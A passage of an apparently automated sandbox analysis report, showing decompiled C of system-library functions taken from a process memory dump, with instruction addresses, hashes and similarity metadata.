                                                                                          								 *(_t528 - 0xa4) = _t306;
                                                                                          								__eflags =  *0x1c260e8;
                                                                                          								if( *0x1c260e8 != 0) {
                                                                                          									__eflags = _t306 - 0x40;
                                                                                          									if(_t306 < 0x40) {
                                                                                          										L20:
                                                                                          										asm("lock inc dword [eax]");
                                                                                          										_t310 =  *0x1c260e8; // 0x0
                                                                                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                          										__eflags = _t311 & 0x00000001;
                                                                                          										if((_t311 & 0x00000001) == 0) {
                                                                                          											 *(_t528 - 0xa0) = _t311;
                                                                                          											_t475 = _t427;
                                                                                          											 *(_t528 - 0x74) = _t427;
                                                                                          											__eflags = _t475;
                                                                                          											if(_t475 != 0) {
                                                                                          												L91:
                                                                                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                          												goto L92;
                                                                                          											}
                                                                                          											asm("sbb edi, edi");
                                                                                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                          											_t511 = _t498;
                                                                                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                          											__eflags =  *(_t312 - 5) & 1;
                                                                                          											if(( *(_t312 - 5) & 1) != 0) {
                                                                                          												_push(_t528 - 0x98);
                                                                                          												_push(0x4c);
                                                                                          												_push(_t528 - 0x70);
                                                                                          												_push(1);
                                                                                          												_push(0xfffffffa);
                                                                                          												_t412 = E01B79710();
                                                                                          												_t475 = _t427;
                                                                                          												__eflags = _t412;
                                                                                          												if(_t412 >= 0) {
                                                                                          													_t414 =  *(_t528 - 0x98) - 8;
                                                                                          													 *(_t528 - 0x98) = _t414;
                                                                                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                          													 *(_t528 - 0x8c) = _t416;
                                                                                          													 *(_t528 - 0x79) = 1;
                                                                                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                          													__eflags = _t511;
                                                                                          												}
                                                                                          											}
                                                                                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                          											__eflags = _t446 & 0x00000004;
                                                                                          											if((_t446 & 0x00000004) != 0) {
                                                                                          												__eflags =  *(_t528 - 0x9c);
                                                                                          												if( *(_t528 - 0x9c) != 0) {
                                                                                          													 *(_t528 - 0x7a) = 1;
                                                                                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                          													__eflags = _t511;
                                                                                          												}
                                                                                          											}
                                                                                          											_t313 = 2;
                                                                                          											_t447 = _t446 & _t313;
                                                                                          											__eflags = _t447;
                                                                                          											 *(_t528 - 0xd4) = _t447;
                                                                                          											if(_t447 != 0) {
                                                                                          												_t406 = 0x10;
                                                                                          												_t511 = _t511 + _t406;
                                                                                          												__eflags = _t511;
                                                                                          											}
                                                                                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                          											 *(_t528 - 0x88) = _t427;
                                                                                          											__eflags =  *(_t528 + 0x1c);
                                                                                          											if( *(_t528 + 0x1c) <= 0) {
                                                                                          												L45:
                                                                                          												__eflags =  *(_t528 - 0xb0);
                                                                                          												if( *(_t528 - 0xb0) != 0) {
                                                                                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                          													__eflags = _t511;
                                                                                          												}
                                                                                          												__eflags = _t475;
                                                                                          												if(_t475 != 0) {
                                                                                          													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                          													goto L100;
                                                                                          												} else {
                                                                                          													_t494[3] = _t511;
                                                                                          													_t451 =  *(_t528 - 0xa0);
                                                                                          													_t427 = E01B76DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                          													 *(_t528 - 0x88) = _t427;
                                                                                          													__eflags = _t427;
                                                                                          													if(_t427 == 0) {
                                                                                          														__eflags = _t511 - 0xfff8;
                                                                                          														if(_t511 <= 0xfff8) {
                                                                                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                          															asm("sbb ecx, ecx");
                                                                                          															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                          														}
                                                                                          														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                          														L100:
                                                                                          														goto L101;
                                                                                          													}
                                                                                          													_t453 =  *(_t528 - 0xa0);
                                                                                          													 *_t494 = _t453;
                                                                                          													_t494[1] = _t427;
                                                                                          													_t494[2] =  *(_t528 - 0xbc);
                                                                                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													__eflags =  *(_t528 + 0x14);
                                                                                          													if( *(_t528 + 0x14) == 0) {
                                                                                          														__eflags =  *[fs:0x18] + 0xf50;
                                                                                          													}
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													asm("movsd");
                                                                                          													__eflags =  *(_t528 + 0x18);
                                                                                          													if( *(_t528 + 0x18) == 0) {
                                                                                          														_t454 =  *(_t528 - 0x80);
                                                                                          														_t479 =  *(_t528 - 0x78);
                                                                                          														_t327 = 1;
                                                                                          														__eflags = 1;
                                                                                          													} else {
                                                                                          														_t146 = _t427 + 0x50; // 0x50
                                                                                          														_t454 = _t146;
                                                                                          														 *(_t528 - 0x80) = _t454;
                                                                                          														_t382 = 0x18;
                                                                                          														 *_t454 = _t382;
                                                                                          														 *((short*)(_t454 + 2)) = 1;
                                                                                          														_t385 = 0x10;
                                                                                          														 *((short*)(_t454 + 6)) = _t385;
                                                                                          														 *(_t454 + 4) = 0;
                                                                                          														asm("movsd");
                                                                                          														asm("movsd");
                                                                                          														asm("movsd");
                                                                                          														asm("movsd");
                                                                                          														_t327 = 1;
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t479 = 0x68;
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          													}
                                                                                          													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                          													if( *(_t528 - 0x79) == _t327) {
                                                                                          														_t524 = _t479 + _t427;
                                                                                          														_t508 =  *(_t528 - 0x8c);
                                                                                          														 *_t524 = _t508;
                                                                                          														_t373 = 2;
                                                                                          														 *((short*)(_t524 + 2)) = _t373;
                                                                                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                          														 *((short*)(_t524 + 4)) = 0;
                                                                                          														_t167 = _t524 + 8; // 0x8
                                                                                          														E01B7F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                          														_t529 = _t529 + 0xc;
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          														_t380 =  *(_t528 - 0x80);
                                                                                          														__eflags = _t380;
                                                                                          														if(_t380 != 0) {
                                                                                          															_t173 = _t380 + 4;
                                                                                          															 *_t173 =  *(_t380 + 4) | 1;
                                                                                          															__eflags =  *_t173;
                                                                                          														}
                                                                                          														_t454 = _t524;
                                                                                          														 *(_t528 - 0x80) = _t454;
                                                                                          														_t327 = 1;
                                                                                          														__eflags = 1;
                                                                                          													}
                                                                                          													__eflags =  *(_t528 - 0xd4);
                                                                                          													if( *(_t528 - 0xd4) == 0) {
                                                                                          														_t505 =  *(_t528 - 0x80);
                                                                                          													} else {
                                                                                          														_t505 = _t479 + _t427;
                                                                                          														_t523 = 0x10;
                                                                                          														 *_t505 = _t523;
                                                                                          														_t367 = 3;
                                                                                          														 *((short*)(_t505 + 2)) = _t367;
                                                                                          														_t368 = 4;
                                                                                          														 *((short*)(_t505 + 6)) = _t368;
                                                                                          														 *(_t505 + 4) = 0;
                                                                                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                          														_t327 = 1;
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t479 = _t479 + _t523;
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          														__eflags = _t454;
                                                                                          														if(_t454 != 0) {
                                                                                          															_t186 = _t454 + 4;
                                                                                          															 *_t186 =  *(_t454 + 4) | 1;
                                                                                          															__eflags =  *_t186;
                                                                                          														}
                                                                                          														 *(_t528 - 0x80) = _t505;
                                                                                          													}
                                                                                          													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                          													if( *(_t528 - 0x7a) == _t327) {
                                                                                          														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                          														E01B7F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                          														_t529 = _t529 + 0xc;
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          														__eflags = _t505;
                                                                                          														if(_t505 != 0) {
                                                                                          															_t199 = _t505 + 4;
                                                                                          															 *_t199 =  *(_t505 + 4) | 1;
                                                                                          															__eflags =  *_t199;
                                                                                          														}
                                                                                          														_t505 =  *(_t528 - 0xd4);
                                                                                          														 *(_t528 - 0x80) = _t505;
                                                                                          													}
                                                                                          													__eflags =  *(_t528 - 0xa8);
                                                                                          													if( *(_t528 - 0xa8) != 0) {
                                                                                          														_t356 = _t479 + _t427;
                                                                                          														 *(_t528 - 0xd4) = _t356;
                                                                                          														_t462 =  *(_t528 - 0xac);
                                                                                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                          														_t485 = 0xc;
                                                                                          														 *((short*)(_t356 + 2)) = _t485;
                                                                                          														 *(_t356 + 6) = _t462;
                                                                                          														 *((short*)(_t356 + 4)) = 0;
                                                                                          														_t211 = _t356 + 8; // 0x9
                                                                                          														E01B7F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                          														E01B7FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                          														_t529 = _t529 + 0x18;
                                                                                          														_t427 =  *(_t528 - 0x88);
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t505 =  *(_t528 - 0xd4);
                                                                                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          														_t362 =  *(_t528 - 0x80);
                                                                                          														__eflags = _t362;
                                                                                          														if(_t362 != 0) {
                                                                                          															_t222 = _t362 + 4;
                                                                                          															 *_t222 =  *(_t362 + 4) | 1;
                                                                                          															__eflags =  *_t222;
                                                                                          														}
                                                                                          													}
                                                                                          													__eflags =  *(_t528 - 0xb0);
                                                                                          													if( *(_t528 - 0xb0) != 0) {
                                                                                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                          														_t458 = 0xb;
                                                                                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                          														E01B7FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                          														_t529 = _t529 + 0xc;
                                                                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                          														 *(_t528 - 0x78) = _t479;
                                                                                          														__eflags = _t505;
                                                                                          														if(_t505 != 0) {
                                                                                          															_t241 = _t505 + 4;
                                                                                          															 *_t241 =  *(_t505 + 4) | 1;
                                                                                          															__eflags =  *_t241;
                                                                                          														}
                                                                                          													}
                                                                                          													_t328 =  *(_t528 + 0x1c);
                                                                                          													__eflags = _t328;
                                                                                          													if(_t328 == 0) {
                                                                                          														L87:
                                                                                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                          														_t455 =  *(_t528 - 0xdc);
                                                                                          														 *(_t427 + 0x14) = _t455;
                                                                                          														_t480 =  *(_t528 - 0xa0);
                                                                                          														_t517 = 3;
                                                                                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                          															asm("rdtsc");
                                                                                          															 *(_t427 + 0x3c) = _t480;
                                                                                          														} else {
                                                                                          															 *(_t427 + 0x3c) = _t455;
                                                                                          														}
                                                                                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                          														_t456 =  *[fs:0x18];
                                                                                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                          														_t427 = 0;
                                                                                          														__eflags = 0;
                                                                                          														_t511 = 0x18;
                                                                                          														goto L91;
                                                                                          													} else {
                                                                                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                          														__eflags = _t519;
                                                                                          														 *(_t528 - 0x8c) = _t328;
                                                                                          														do {
                                                                                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                          																_t334 =  *_t519;
                                                                                          															} else {
                                                                                          																_t334 = 0;
                                                                                          															}
                                                                                          															_t336 = _t334 & 0x000000ff;
                                                                                          															__eflags = _t336;
                                                                                          															_t427 =  *(_t528 - 0x88);
                                                                                          															if(_t336 == 0) {
                                                                                          																_t481 = _t479 + _t506;
                                                                                          																__eflags = _t481;
                                                                                          																 *(_t528 - 0x78) = _t481;
                                                                                          																E01B7F3E0(_t479 + _t427, _t457, _t506);
                                                                                          																_t529 = _t529 + 0xc;
                                                                                          															} else {
                                                                                          																_t340 = _t336 - 1;
                                                                                          																__eflags = _t340;
                                                                                          																if(_t340 == 0) {
                                                                                          																	E01B7F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                          																	_t529 = _t529 + 0xc;
                                                                                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                          																} else {
                                                                                          																	__eflags = _t340 == 0;
                                                                                          																	if(_t340 == 0) {
                                                                                          																		__eflags = _t506 - 8;
                                                                                          																		if(_t506 == 8) {
                                                                                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                          																		}
                                                                                          																	}
                                                                                          																}
                                                                                          															}
                                                                                          															_t339 = 0x10;
                                                                                          															_t519 = _t519 + _t339;
                                                                                          															_t263 = _t528 - 0x8c;
                                                                                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                          															__eflags =  *_t263;
                                                                                          															_t479 =  *(_t528 - 0x78);
                                                                                          														} while ( *_t263 != 0);
                                                                                          														goto L87;
                                                                                          													}
                                                                                          												}
                                                                                          											} else {
                                                                                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                          												 *(_t528 - 0xa2) = _t392;
                                                                                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                          												__eflags = _t469;
                                                                                          												while(1) {
                                                                                          													 *(_t528 - 0xe4) = _t511;
                                                                                          													__eflags = _t392;
                                                                                          													_t393 = _t427;
                                                                                          													if(_t392 != 0) {
                                                                                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                          													}
                                                                                          													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                          													__eflags = _t395;
                                                                                          													if(_t395 == 0) {
                                                                                          														_t511 = _t511 +  *_t469;
                                                                                          														__eflags = _t511;
                                                                                          													} else {
                                                                                          														_t398 = _t395 - 1;
                                                                                          														__eflags = _t398;
                                                                                          														if(_t398 == 0) {
                                                                                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                          														} else {
                                                                                          															__eflags = _t398 == 1;
                                                                                          															if(_t398 == 1) {
                                                                                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                          																_t402 =  *_t469 & 0x0000ffff;
                                                                                          																 *(_t528 - 0xac) = _t402;
                                                                                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                          															}
                                                                                          														}
                                                                                          													}
                                                                                          													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                          													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                          														break;
                                                                                          													}
                                                                                          													_t397 =  *(_t528 - 0x88) + 1;
                                                                                          													 *(_t528 - 0x88) = _t397;
                                                                                          													_t469 = _t469 + 0x10;
                                                                                          													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                          													_t392 =  *(_t528 - 0xa2);
                                                                                          													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                          														continue;
                                                                                          													}
                                                                                          													goto L45;
                                                                                          												}
                                                                                          												_t475 = 0x216;
                                                                                          												 *(_t528 - 0x74) = 0x216;
                                                                                          												goto L45;
                                                                                          											}
                                                                                          										} else {
                                                                                          											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                          											goto L16;
                                                                                          										}
                                                                                          									}
                                                                                          									_t491 = E01C04CAB(_t306, _t528 - 0xa4);
                                                                                          									 *(_t528 - 0x74) = _t491;
                                                                                          									__eflags = _t491;
                                                                                          									if(_t491 != 0) {
                                                                                          										goto L91;
                                                                                          									} else {
                                                                                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                          										goto L20;
                                                                                          									}
                                                                                          								}
                                                                                          								L16:
                                                                                          								 *(_t528 - 0x74) = 0x1069;
                                                                                          								L93:
                                                                                          								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                          								 *(_t528 - 0xd0) = _t298;
                                                                                          								_t474 = _t474 + _t511;
                                                                                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                          								_t494 = 4;
                                                                                          								__eflags = _t298 - _t494;
                                                                                          								if(_t298 >= _t494) {
                                                                                          									goto L100;
                                                                                          								}
                                                                                          								_t494 =  *(_t528 - 0xcc);
                                                                                          								_t435 = _t298;
                                                                                          								continue;
                                                                                          							}
                                                                                          							__eflags = _t494[2] | _t494[3];
                                                                                          							if((_t494[2] | _t494[3]) == 0) {
                                                                                          								goto L15;
                                                                                          							}
                                                                                          							goto L12;
                                                                                          						}
                                                                                          						__eflags = _t301;
                                                                                          						if(_t301 != 0) {
                                                                                          							goto L92;
                                                                                          						}
                                                                                          						goto L10;
                                                                                          						L92:
                                                                                          						goto L93;
                                                                                          					}
                                                                                          				} else {
                                                                                          					_push(0x57);
                                                                                          					L101:
                                                                                          					return E01B8D130(_t427, _t494, _t511);
                                                                                          				}
                                                                                          			}
                                                                                          0x01c061bb
                                                                                          0x01c061c0
                                                                                          0x01c061c3
                                                                                          0x01c061cc
                                                                                          0x01c061d0
                                                                                          0x01c061dc
                                                                                          0x01c061de
                                                                                          0x01c061e1
                                                                                          0x01c061e4
                                                                                          0x01c061e6
                                                                                          0x01c061e8
                                                                                          0x01c061e8
                                                                                          0x01c061e8
                                                                                          0x01c061e8
                                                                                          0x01c061e6
                                                                                          0x01c061ec
                                                                                          0x01c061f3
                                                                                          0x01c06203
                                                                                          0x01c06209
                                                                                          0x01c0620a
                                                                                          0x01c06216
                                                                                          0x01c0621d
                                                                                          0x01c06227
                                                                                          0x01c06241
                                                                                          0x01c06246
                                                                                          0x01c0624c
                                                                                          0x01c06257
                                                                                          0x01c06259
                                                                                          0x01c0625c
                                                                                          0x01c0625e
                                                                                          0x01c06260
                                                                                          0x01c06260
                                                                                          0x01c06260
                                                                                          0x01c06260
                                                                                          0x01c0625e
                                                                                          0x01c06264
                                                                                          0x01c06267
                                                                                          0x01c06269
                                                                                          0x01c06315
                                                                                          0x01c06315
                                                                                          0x01c0631b
                                                                                          0x01c0631e
                                                                                          0x01c06324
                                                                                          0x01c06327
                                                                                          0x01c0632f
                                                                                          0x01c06330
                                                                                          0x01c06333
                                                                                          0x01c0633a
                                                                                          0x01c0633c
                                                                                          0x01c06335
                                                                                          0x01c06335
                                                                                          0x01c06335
                                                                                          0x01c0633f
                                                                                          0x01c06342
                                                                                          0x01c0634c
                                                                                          0x01c06352
                                                                                          0x01c06355
                                                                                          0x01c06355
                                                                                          0x01c06359
                                                                                          0x00000000
                                                                                          0x01c0626f
                                                                                          0x01c06275
                                                                                          0x01c06275
                                                                                          0x01c06278
                                                                                          0x01c0627e
                                                                                          0x01c0627e
                                                                                          0x01c06281
                                                                                          0x01c06287
                                                                                          0x01c0628d
                                                                                          0x01c06298
                                                                                          0x01c0629c
                                                                                          0x01c062a2
                                                                                          0x01c0629e
                                                                                          0x01c0629e
                                                                                          0x01c0629e
                                                                                          0x01c062a7
                                                                                          0x01c062a7
                                                                                          0x01c062aa
                                                                                          0x01c062b0
                                                                                          0x01c062f0
                                                                                          0x01c062f0
                                                                                          0x01c062f2
                                                                                          0x01c062f8
                                                                                          0x01c062fd
                                                                                          0x01c062b2
                                                                                          0x01c062b2
                                                                                          0x01c062b2
                                                                                          0x01c062b5
                                                                                          0x01c062dd
                                                                                          0x01c062e2
                                                                                          0x01c062e5
                                                                                          0x01c062b7
                                                                                          0x01c062b8
                                                                                          0x01c062bb
                                                                                          0x01c062bd
                                                                                          0x01c062c0
                                                                                          0x01c062c4
                                                                                          0x01c062cd
                                                                                          0x01c062cd
                                                                                          0x01c062c0
                                                                                          0x01c062bb
                                                                                          0x01c062b5
                                                                                          0x01c06302
                                                                                          0x01c06303
                                                                                          0x01c06305
                                                                                          0x01c06305
                                                                                          0x01c06305
                                                                                          0x01c0630c
                                                                                          0x01c0630c
                                                                                          0x00000000
                                                                                          0x01c0627e
                                                                                          0x01c06269
                                                                                          0x01c05eac
                                                                                          0x01c05ebb
                                                                                          0x01c05ebe
                                                                                          0x01c05ecb
                                                                                          0x01c05ecb
                                                                                          0x01c05ece
                                                                                          0x01c05ece
                                                                                          0x01c05ed4
                                                                                          0x01c05ed7
                                                                                          0x01c05ed9
                                                                                          0x01c05edb
                                                                                          0x01c05edb
                                                                                          0x01c05ee1
                                                                                          0x01c05ee1
                                                                                          0x01c05ee3
                                                                                          0x01c05f20
                                                                                          0x01c05f20
                                                                                          0x01c05ee5
                                                                                          0x01c05ee5
                                                                                          0x01c05ee5
                                                                                          0x01c05ee8
                                                                                          0x01c05f11
                                                                                          0x01c05f18
                                                                                          0x01c05eea
                                                                                          0x01c05eea
                                                                                          0x01c05eed
                                                                                          0x01c05ef2
                                                                                          0x01c05ef8
                                                                                          0x01c05efb
                                                                                          0x01c05f0a
                                                                                          0x01c05f0a
                                                                                          0x01c05eed
                                                                                          0x01c05ee8
                                                                                          0x01c05f22
                                                                                          0x01c05f28
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01c05f30
                                                                                          0x01c05f31
                                                                                          0x01c05f37
                                                                                          0x01c05f3a
                                                                                          0x01c05f3d
                                                                                          0x01c05f44
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01c05f46
                                                                                          0x01c05f48
                                                                                          0x01c05f4d
                                                                                          0x00000000
                                                                                          0x01c05f4d
                                                                                          0x01c05dda
                                                                                          0x01c05ddf
                                                                                          0x00000000
                                                                                          0x01c05ddf
                                                                                          0x01c05dd8
                                                                                          0x01c05da7
                                                                                          0x01c05da9
                                                                                          0x01c05dac
                                                                                          0x01c05dae
                                                                                          0x00000000
                                                                                          0x01c05db4
                                                                                          0x01c05db4
                                                                                          0x00000000
                                                                                          0x01c05db4
                                                                                          0x01c05dae
                                                                                          0x01c05d88
                                                                                          0x01c05d8d
                                                                                          0x01c06363
                                                                                          0x01c06369
                                                                                          0x01c0636a
                                                                                          0x01c06370
                                                                                          0x01c06372
                                                                                          0x01c0637a
                                                                                          0x01c0637b
                                                                                          0x01c0637d
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01c0637f
                                                                                          0x01c06385
                                                                                          0x00000000
                                                                                          0x01c06385
                                                                                          0x01c05d38
                                                                                          0x01c05d3b
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01c05d3b
                                                                                          0x01c05d27
                                                                                          0x01c05d29
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01c06360
                                                                                          0x00000000
                                                                                          0x01c06360
                                                                                          0x01c05c10
                                                                                          0x01c05c10
                                                                                          0x01c063da
                                                                                          0x01c063e5
                                                                                          0x01c063e5

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e60f2520381d709ad65f1cb77b959aecde446d574bfdaef7dcaf1778abcddc79
                                                                                          • Instruction ID: a01b9cb4080bf0abc3de4c99716c5bff78d2970d81dc529b8ac48fc826abe1de
                                                                                          • Opcode Fuzzy Hash: e60f2520381d709ad65f1cb77b959aecde446d574bfdaef7dcaf1778abcddc79
                                                                                          • Instruction Fuzzy Hash: C3425C75900229CFDB25CF68C880BA9BBB1FF49704F1481AAD95DEB282D734DA95CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 92%
                                                                                          			E01B54120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                          				signed int _v8;
                                                                                          				void* _v20;
                                                                                          				signed int _v24;
                                                                                          				char _v532;
                                                                                          				char _v540;
                                                                                          				signed short _v544;
                                                                                          				signed int _v548;
                                                                                          				signed short* _v552;
                                                                                          				signed short _v556;
                                                                                          				signed short* _v560;
                                                                                          				signed short* _v564;
                                                                                          				signed short* _v568;
                                                                                          				void* _v570;
                                                                                          				signed short* _v572;
                                                                                          				signed short _v576;
                                                                                          				signed int _v580;
                                                                                          				char _v581;
                                                                                          				void* _v584;
                                                                                          				unsigned int _v588;
                                                                                          				signed short* _v592;
                                                                                          				void* _v597;
                                                                                          				void* _v600;
                                                                                          				void* _v604;
                                                                                          				void* _v609;
                                                                                          				void* _v616;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				unsigned int _t161;
                                                                                          				signed int _t162;
                                                                                          				unsigned int _t163;
                                                                                          				void* _t169;
                                                                                          				signed short _t173;
                                                                                          				signed short _t177;
                                                                                          				signed short _t181;
                                                                                          				unsigned int _t182;
                                                                                          				signed int _t185;
                                                                                          				signed int _t213;
                                                                                          				signed int _t225;
                                                                                          				short _t233;
                                                                                          				signed char _t234;
                                                                                          				signed int _t242;
                                                                                          				signed int _t243;
                                                                                          				signed int _t244;
                                                                                          				signed int _t245;
                                                                                          				signed int _t250;
                                                                                          				void* _t251;
                                                                                          				signed short* _t254;
                                                                                          				void* _t255;
                                                                                          				signed int _t256;
                                                                                          				void* _t257;
                                                                                          				signed short* _t260;
                                                                                          				signed short _t265;
                                                                                          				signed short* _t269;
                                                                                          				signed short _t271;
                                                                                          				signed short** _t272;
                                                                                          				signed short* _t275;
                                                                                          				signed short _t282;
                                                                                          				signed short _t283;
                                                                                          				signed short _t290;
                                                                                          				signed short _t299;
                                                                                          				signed short _t307;
                                                                                          				signed int _t308;
                                                                                          				signed short _t311;
                                                                                          				signed short* _t315;
                                                                                          				signed short _t316;
                                                                                          				void* _t317;
                                                                                          				void* _t319;
                                                                                          				signed short* _t321;
                                                                                          				void* _t322;
                                                                                          				void* _t323;
                                                                                          				unsigned int _t324;
                                                                                          				signed int _t325;
                                                                                          				void* _t326;
                                                                                          				signed int _t327;
                                                                                          				signed int _t329;
                                                                                          
                                                                                          				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                          				_v8 =  *0x1c2d360 ^ _t329;
                                                                                          				_t157 = _a8;
                                                                                          				_t321 = _a4;
                                                                                          				_t315 = __edx;
                                                                                          				_v548 = __ecx;
                                                                                          				_t305 = _a20;
                                                                                          				_v560 = _a12;
                                                                                          				_t260 = _a16;
                                                                                          				_v564 = __edx;
                                                                                          				_v580 = _a8;
                                                                                          				_v572 = _t260;
